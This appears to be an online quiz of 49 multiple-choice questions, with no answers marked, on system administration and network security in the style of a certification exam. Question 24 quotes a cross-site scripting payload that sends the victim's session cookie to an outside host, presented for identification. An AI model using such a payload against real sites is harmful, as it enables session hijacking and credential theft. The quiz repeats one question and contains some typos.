Can You Pass This System Administrator And Server Test?

49 Questions | Total Attempts: 310

SettingsSettingsSettings
Please wait...
Can You Pass This System Administrator And Server Test?

A system administrator is a person who manages the IT system and responsible for optimizing the IT services, Networking Servers and support systems. In large Organizations, a system administrator administers the online data or cloud computing services to secure the network and prevent from the security breach or hacking. This quiz has been developed to test your knowledge about system administration and servers. So, let's try out the quiz. All the best!


Questions and Answers
  • 1. 
    Ann a new systems administrator, is enabling auditing of server file access successes and failures. She has configured the system policy to enable auditing for file access. However, when she reviews the event logs, she does not see any updates to the log files. Which of the following should be done to ensure capture of audit logs?
    • A. 

      Restart the audit service to enable the logs to be collected

    • B. 

      Enable the objects properties for auditing

    • C. 

      Set write permissions on the folders to be audited

    • D. 

      Configure an audit security group and assign the group to the share files

  • 2. 
    A company is concerned with multiple attacks on the ERP system and wants to configure a secondary ERP to mirror the first. The secondary ERP will contain padded information to monitor against attacks. Which of the following should the company deploy?
    • A. 

      Honeypot

    • B. 

       Bastion host

    • C. 

       IDS

    • D. 

      Sandbox

  • 3. 
    A company employs a firewall to protect its internal network. An internal router resides directly behind the firewall and is used to segment traffic to different subnets. Which of the following terms MOST accurately describes the use of multiple devices in layers to protect a network?
    • A. 

      Zoning

    • B. 

      Defense-in-depth

    • C. 

      Logical segmentation

    • D. 

      Network hardening

  • 4. 
    A security administrator wants to implement a solution to encrypt communications between the company’s servers and client workstations. The solution must account for protocols at layers 4 through 7 of the OSI model. Which of the following should be implemented?
    • A. 

      ISCSI

    • B. 

      SSH

    • C. 

      IPSec

    • D. 

      SCP

  • 5. 
    A company is installing a wireless network. The company anticipates that with future growth, it will require employees to use digital certificates. Additionally, the company excepts to integrate Kerberos authentication within the next few years. Which of the following protocols BEST meets these requirements?
    • A. 

      CHAP

    • B. 

      EAP

    • C. 

      PAP

    • D. 

      MS-CHAP

  • 6. 
    The Chief Information Security Officer receives notification that a high-ranking employee is stealing corporate secrets for a competing organization. This employee is now considered
    • A. 

      A risk

    • B. 

      An exploit

    • C. 

      A threat

    • D. 

      A vulnerability

  • 7. 
    1. A public-facing web server is added to an existing network. This server must be isolated from the production network. The BEST way to add this server to the existing network design is to place the server
    • A. 

      In the same subnet as the other servers

    • B. 

      In the production VLAN

    • C. 

      In a DMZ

    • D. 

      In a separate VLAN

  • 8. 
    An accounting firm wants to increase the availability of its email services. Management has requested that the email servers be upgraded to ensure performance In the event of disk failures. The servers should be able to recover quickly from single disk failure with little to no downtime. Which of the following options would BEST meet these requirements?( Select TWO)
    • A. 

      Use RAID 0 Arrays on the servers

    • B. 

      Use RAID 5 arrays on the servers

    • C. 

      Use RAID 10 arrays on the servers

    • D. 

      Use network-based backup tools to perform weekly full backups

    • E. 

      Use tape backups and restore to a warm site during a failover

    • F. 

      User clustered replication of the email database for failover

  • 9. 
    An administrator places a server in “Permissive” mode to monitor security events before increasing system security. Which of the following tools is the administrator using?
    • A. 

      SELinux

    • B. 

      Containers

    • C. 

      Iptables

    • D. 

      Trusted Solaris

  • 10. 
    With MDM, which of the following is the BEST policy to implement in case of device theft?
    • A. 

      Choose devices without removable storage to prevent easy removal of data

    • B. 

      Ensure company devices are encrypted to prevent data seizure if an image is taken

    • C. 

      Disable certain features on the phone to prevent misuse of company device

    • D. 

      Have a remote wiping policy so if the device is stolen, the data is unrecoverable

  • 11. 
    A security administrator needs to improve upon the current authentication system. The improved authentication system must require a second authentication factor must provide a new six-digit number only when a button is pressed on the device. Which of the following should be implemented?
    • A. 

      HSM

    • B. 

      TPM

    • C. 

      SMS OTP

    • D. 

      HOTP

    • E. 

      TOTP

  • 12. 
    A pool of corporate users consists of various global staff members who use different types of authentication services, such as Kerberos and one-time passwords. Due to the operational nature of the infrastructure, a standardized way of authenticating cannot be used, but authorization of users is still necessary. Which of the following should the company utilize to authorize the staff members?
    • A. 

      PAP

    • B. 

      CHAP

    • C. 

      SAML

    • D. 

      EAP

  • 13. 
    A recent audit has revealed a long-term employee has access to shares in several different departments that are not related to the employee’s current position. Which of the following would reduce the likelihood of this issue occurring again?
    • A. 

      Periodic user account audits

    • B. 

      User assigned privileges

    • C. 

      Continuous alert monitoring

    • D. 

      Biometric user authentication

  • 14. 
    A developer needs to store sensitive employee information on a back-end database. The sensitive database records must be accessed by a public web server in the DMZ. Which of the following should be implemented to secure the sensitive information stored in the database?
    • A. 

      Store the sensitive records using symmetric encryption

    • B. 

      Implement an ACL that prevents the web server from accessing the sensitive records

    • C. 

      Hash the sensitive records before storing them in the database

    • D. 

      Store the sensitive records using irreversible encryption

  • 15. 
    Which of the following uses signatures to ONLY detect network-based attacks?
    • A. 

      HIPS

    • B. 

      NAC

    • C. 

      WAF

    • D. 

      NIDS

  • 16. 
    A hospital uses legacy medical devices that are incompatible with OS upgrades. Which of the following should be used to secure these devices from unauthorized use by internal employees?
    • A. 

      Proxy server

    • B. 

      Network segmentation

    • C. 

      Intrusion prevention system

    • D. 

      Web application firewall

  • 17. 
    Joe, an instructor, routinely needs to run software created by students from a graduate-level programming course. He executes these programs on his office computer, which also has access to several university resources, including the database containing student grades. Joe is concerned because several of the students’ executables are oddly large and could potentially contain malicious payloads. A security administrator is helping Joe to prevent the students code from posing a security risk while maintaining his access to all university resources. Which of the following should the security administrator do to BEST fulfill the requirements?
    • A. 

      Implement an application whitelist on the workstation

    • B. 

      Install a HIDS

    • C. 

      Turn on DEP, SEHOP, and ASLR on the workstation’s OS

    • D. 

      Air gap the professor’s workstation

    • E. 

      Create a VM on the workstation

    • F. 

      Install antivirus and anti-malware software

  • 18. 
    A security technician is reviewing a new vendor’s practices for a project, but the vendor only supplied SLA documentation. Which of the following should the security technician request to understand the vendor’s adherence to its own policies?
    • A. 

      Controls data audits

    • B. 

      Entry log audits

    • C. 

      Access log audits

    • D. 

      Security log audits

  • 19. 
    When authenticating to a database, users are required to use ten-character passwords and change their passwords every 60 days. Which of the following should also be added to this password policy to mitigate the possibility of password compromise? (Select TWO)
    • A. 

      Password recovery

    • B. 

      Lockout period

    • C. 

      Increased complexity

    • D. 

      Limited reuse

    • E. 

      Account disablement

  • 20. 
    A systems administrator has received notification that an attacker has been attempting to spear phish the organizations management team. The payload installs a specific executable, which then connects to an outside server and downloads additional instructions. By specifically blocking the executable involved in the attack with the organization’s HIPS platform, which of the following is the administrator performing?
    • A. 

      Whitelisting

    • B. 

      Patching

    • C. 

      Blacklisting

    • D. 

      Sandboxing

  • 21. 
    A company utilizes a mission-critical ERP supply chain solution. Over several years, development efforts and expansion of modules have been a priority to facilitate the increasing demand. Maintenance windows have been historically used to deploy new, updated code or a new module future set. Over time the response of the ERP system has become slow and unstable, causing a delay in services the company provides to its customers. The security administrator begins investigating the issues and reviews the change management logs to attempt to correlate what may have caused the degradation. Which of the following would BEST stabilize and increase the performance of the ERP solution?
    • A. 

      Implement database failover to assist in managing session states

    • B. 

      Migrate the ERP environment to a mirrored storage solution

    • C. 

      Increase the memory on the database server

    • D. 

      Update the software to the current patch level

  • 22. 
    Which of the following should include a threat probability matrix?
    • A. 

      Incident response plan

    • B. 

      Backup plan

    • C. 

      Disaster recovery plan

    • D. 

      Business impact analysis

  • 23. 
    A recent security audit revealed several unauthorized devices were plugged into network jacks in unused cubicles. Which of the following could be used to help the security administrator reduce investigative overhead if this scenario occurs again?
    • A. 

      Rogue machine detection

    • B. 

      IDS

    • C. 

      Network firewall

    • D. 

      HIPS

  • 24. 
    A security administrator notices the following anomaly when reviewing the web proxy logs: http://intranet/page.asp?variable=”> document. Location=’http://www.darkweb.com/?’20 document.cookie. Which of the following vulnerabilities is being exploited?
    • A. 

      XSRF

    • B. 

      SQL injection

    • C. 

      XSS

    • D. 

      Session hijacking

  • 25. 
    A server administrator recently implemented file system ACLs on a web server. The webmaster now reports the following message bash: vim: permission denied. Which of the following commands will assist in resolving the problem?
    • A. 

      Calcs

    • B. 

      Ls –la

    • C. 

      Setfacl

    • D. 

      Getfacl

  • 26. 
    A CEO tells a security technician that he is concerned about preventive, detective, and corrective controls that they need to protect sensitive non-time critical information stored in the finance department. The finance department is located on the ground floor of a publicly accessible building and shares a common network with the sales department. Which of the following would be the MOST economical and would meet the CEO’s requirements?
    • A. 

      Install a firewall to segregate finance form the sales network, place alarm motion detectors on the ground floor and securely back up finance data

    • B. 

      Install firewall to segregate finance from the sales network, place security guards in the ground floor foyer, and provision a cold site for data redundancy

    • C. 

      Install a HIDS on all the finance department’s PCs, place alarm motion detectors on the ground floor and provision a warm site for redundancy

    • D. 

      Install an IDS to detect malicious users, place security guards in the ground floor foyer and provision a hot site for data redundancy

  • 27. 
    Ann, an employee, is attempting to send a digitally signed email to Joe, a manager. After applying the proper settings to her email. Ann is unable to sign the email digitally. This is most likely happening because there is an issue with
    • A. 

      Ann’s public key

    • B. 

      Ann’s private key

    • C. 

      Joe’s private key

    • D. 

      Joe’s public key

  • 28. 
    A security specialist is trying to determine the software product and version of several HTTP and SMTP servers on the network. The specialist decides a quick banner grab should suffice. Which of the following protocols would be the MOST helpful in accomplishing this goal?
    • A. 

      SSH

    • B. 

      DNS

    • C. 

      Telnet

    • D. 

      SCP

    • E. 

      TFTP

  • 29. 
    During an assessment, an auditor observes employees holding the door for other personnel despite the presence of a swipe reader and an organizational policy that requires all personnel to swipe into secure areas. Which of the following did the auditor observe?
    • A. 

      Piggybacking

    • B. 

      Tailgating

    • C. 

      Impersonation

    • D. 

      Shoulder surfing

  • 30. 
    Joe a technician recently updated the intrusion detection signatures for new malware however, this rule has generated an overwhelming number of IDS alerts. The investigation from these events have been deemed non-threatening. These IDS alerts are considered to be
    • A. 

      False positives

    • B. 

      False negatives

    • C. 

      Exploited anomaly

    • D. 

      Malicious logic

  • 31. 
    Which of the following are the BEST ways to prevent personally owned electronic devices from being connected to a corporate network? (select Two)
    • A. 

      Strong authentication with a hardware component

    • B. 

      MAC-based network authentication

    • C. 

      Annual technology refresh cycle

    • D. 

      Installing a guest network with WPA2

    • E. 

      Drafting a clear BYOD policy

    • F. 

      Disabling SSID broadcast and using RF shielding

  • 32. 
    While creating the requirements for an upcoming project, the data owner classifies the data as critical to the success of the project, publicly available, available 85% of the time and requiring full backups each day. Which of the following security goals is MOST important for this project?
    • A. 

      Confidentiality

    • B. 

      Integrity

    • C. 

      Availability

    • D. 

      Redundancy

  • 33. 
    A company is getting billed for excess network usage, even though its usage has not changed. The company’s wireless network has been slow. The number of hosts on the network exceeds the number of wireless devices the company owns. The company has WEP-encrypted access points cascading off a router. Which of the following would solve the issue? (select Two)
    • A. 

      Encrypt the wireless points using WPA2

    • B. 

      Disable SSID broadcast

    • C. 

      Use MAC filtering based on company devices

    • D. 

      Change the antenna placement

    • E. 

      Perform a site survey

  • 34. 
    An organization adopted a BYOD policy that allows employees to bring their personal laptops to work and only connect to the wireless network. The human resources department has received a complaint from a supervisor about an employee who spends too much time on non-work-related activities. The human resources department decides to submit a request to the IT security department to revoke the employee’s BYOD privileges. Which of the following is the BEST mitigation technique the IT security department should use to fulfill this request?
    • A. 

      Add the MA addresses for the employee’s personal devices to a filter

    • B. 

      Add the IP addresses for the employee’s personal devices to a filter

    • C. 

      Revoke the Kerberos tickets assigned to the employee’s devices

    • D. 

      Revoke the WPA2 enterprise credentials assigned to the employee’s personal devices

  • 35. 
    After completing an audit, the auditor releases the following finding to the security team: Finding 3A: Use of weak cryptographic authentication with no SALT.  Which of the following cryptographic algorithms cause this finding? (select Two)
    • A. 

      EAP

    • B. 

      LEAP

    • C. 

      MS-CHAPv2

    • D. 

      Blowfish

    • E. 

      Diffie-Hellman

  • 36. 
    A PKI user has been compromised and the user’s certificate has been revoked. Which of the following protocols will the web application use to ensure the certificate cannot be used?
    • A. 

      CRL

    • B. 

      OCSP

    • C. 

      Key escrow

    • D. 

      CA

  • 37. 
    An organization’s IT manager is implementing some new controls related to the secure management and configuration of network equipment within the production architecture. One of the controls requires log files to be stored away from the network perimeter and secured against unauthorized modification. Which of the following would BEST provide the capability required to address this control?
    • A. 

       File integrity monitor

    • B. 

      SIEM

    • C. 

      DMZ

    • D. 

      Local RAID drive

  • 38. 
    An administrator finds many employees are clicking on links in phishing emails. Which of the following should the administrator implement to protect workers who are tricked by these emails?                
    • A. 

      URL filter

    • B. 

      Spam filter

    • C. 

      Protocol analyzer

    • D. 

      Web application firewall

  • 39. 
    Which of the following risk mitigation strategies could be implemented to ensure IT staff does not implement unapproved modifications to the company’s email system?
    • A. 

      Incident management

    • B. 

      Change management

    • C. 

      Data loss prevention

    • D. 

      Routine audits

  • 40. 
    A consulting firm has been hired to secure a new web application against XSS. Which of the following would be the BEST control to implement?
    • A. 

      Input validation

    • B. 

      Whitelisting

    • C. 

      Error and exception handling

    • D. 

      Access control list

  • 41. 
    A security engineer is asked to value performance while maintaining security on the company’s streaming media site. After some industry concerns arise with the way the company has implemented its RC4 algorithm, the security administrator decides to switch away from it in favor of a stronger algorithm. Which of the following should the security administrator utilize while still favoring performance?
    • A. 

      Blowfish in counter mode

    • B. 

      RIPEMD using electronic code book

    • C. 

      DES using cipher feedback

    • D. 

      3DES using Galois counter mode

  • 42. 
    During a disaster recovery testing procedure a typically disabled service on the application server was started. Which of the following tools would BEST indentify situations in which the service is not shut down?
    • A. 

      NIDS

    • B. 

      Baseline analyzer

    • C. 

      File integrity monitoring

    • D. 

      SIEM

  • 43. 
    Joe, a security administrator, has started using a centralized application whitelist in his organization. Joe wishes only to allow applications within a specific folder to execute. Additionally, Joe would like to allow all applications from a specific vendor. Which of the following controls should Joe implement? (Select TWO)
    • A. 

      Create “deny” rules for all applications with a specific file hash

    • B. 

      Create “deny” rules for all applications with a specified file path

    • C. 

      Create “allow” rules for applications signed with a specific digital signature

    • D. 

      Create “allow” rules for applications with a specific file extension

    • E. 

      Create “allow” rules for applications within a specified file path

    • F. 

      Create “deny” rules for applications signed with a specific digital signature

  • 44. 
    A development company intends to market its OS product toward high-security users. When designing the kernel’s security architecture, the development team begins to map out specific objects and determine which subjects will need to be able to access those objects. The team defines specific security domains that provide the context for this access control. Which of the following represents the access control objective the development team is trying to achieve?
    • A. 

      MAC

    • B. 

      Rule-based access control

    • C. 

      DAC

    • D. 

      Role-based access control

  • 45. 
    A consulting firm has been hired to secure a new web application against XSS. Which of the following would be the BEST control to implement?
    • A. 

      Input validation

    • B. 

      Whitelisting

    • C. 

      Error and exception handling

    • D. 

      Access control list

  • 46. 
    A linux server hosts home directories for members of the marketing team. File system ACL’s are in place in the home directories to allow for collaboration. Users report they are unable to view any files in a particular user’s home directory. Which of the following commands will allow the server administrator to view the file system ACLs in use on the /home/username directory?
    • A. 

      Getfacl /home/username

    • B. 

      Setfacl /home/username

    • C. 

      Ls –lz /home/username

    • D. 

      Getfacl –l /home

  • 47. 
    Some malware variants call back to command and control servers operated at URLs that are cryptographically generated according to the date of infection. The malware authors register the seemingly random URLs days in advance of the anticipated infections and call backs. Which of the following should a security engineer implement to prevent infections from reaching the command and control servers?
    • A. 

      Host-based IPS

    • B. 

      Signature-based IPS

    • C. 

      URL filtering

    • D. 

      Network-based content inspection

  • 48. 
    While reviewing access logs, a security administrator discovers the following output: Hostnames: zxp521, mic, Darwin: ip address: 64.213.8.1, 205.8.7.3 and 118.6.2.4: token serial s10a7f9, s10a7f9 and s10a7f9: time is 13:13, 14:01 and 14:35. Which of the following should the security administrator recommend to increase the security posture for authentication?
    • A. 

      Single sign-on access

    • B. 

      Smart card

    • C. 

      Access control

    • D. 

      Multifactor authentication

  • 49. 
    A security audit has determined the external firewall is improperly configured. Users must be able to access an RDP server and an HTTPS server remotely connected to a secured linux terminal, and access incoming emails exclusively using SSL/TLS. All other incoming traffic should be disallowed. The current incoming firewall rules are as follows: Line      IP address             port      protocol    Action 10        172.17.20.98          3389        TCP            allow 20         172.17.10.50          110          TCP            ALLOW 30        172.147.50.65          69           UDP           ALLOW 40        172.17.30.28             23          TCP             ALLOW 50        172.17.30.28             22          TCP             ALLOW 60        172.17.10.51             443        TCP            ALLOW 70         ANY                            Any       ANY           Deny                   Which of the following firewall rule changes would meet the above criteria? (Select Three)
    • A. 

      Remove line 10

    • B. 

      Remove line 30

    • C. 

      Change the protocol to TCP on line 30

    • D. 

      Remove line 40

    • E. 

      Change the port to 514 on line 50

    • F. 

      Change the port to 995 on line 20

    • G. 

      Change the port to 8080 on line 60